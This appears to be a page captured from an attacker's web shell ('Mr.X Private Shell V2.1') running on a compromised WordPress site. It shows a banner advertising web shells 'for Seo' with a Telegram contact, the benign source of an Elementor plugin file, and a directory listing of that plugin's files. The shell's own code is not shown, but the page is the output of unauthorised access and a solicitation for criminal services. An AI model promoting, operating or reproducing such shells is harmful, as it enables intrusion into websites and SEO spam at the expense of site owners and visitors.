__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Elementor\Modules\ProInstall;
use Elementor\Core\Admin\Menu\Interfaces\Admin_Menu_Item_With_Page;
use Elementor\Settings;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
class Pro_Install_Menu_Item implements Admin_Menu_Item_With_Page {
private Connect_Page_Renderer $renderer;
public function __construct( Connect $connect, array $script_config ) {
$page_url = admin_url( 'admin.php?page=elementor-connect-account' );
$this->renderer = new Connect_Page_Renderer( $connect, $page_url, $script_config );
}
public function get_label(): string {
return esc_html__( 'Connect Account', 'elementor' );
}
public function get_page_title(): string {
return esc_html__( 'Connect Settings', 'elementor' );
}
public function get_capability(): string {
return 'manage_options';
}
public function get_parent_slug(): string {
return Settings::PAGE_ID;
}
public function is_visible(): bool {
return true;
}
public function render() {
$this->renderer->render();
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| connect-page-renderer.php | File | 5.23 KB | 0664 |
|
| connect.php | File | 885 B | 0664 |
|
| editor-one-connect-account-menu-item.php | File | 1.4 KB | 0664 |
|
| module.php | File | 2.96 KB | 0664 |
|
| plugin-installer.php | File | 2.29 KB | 0664 |
|
| pro-install-menu-item.php | File | 1.01 KB | 0664 |
|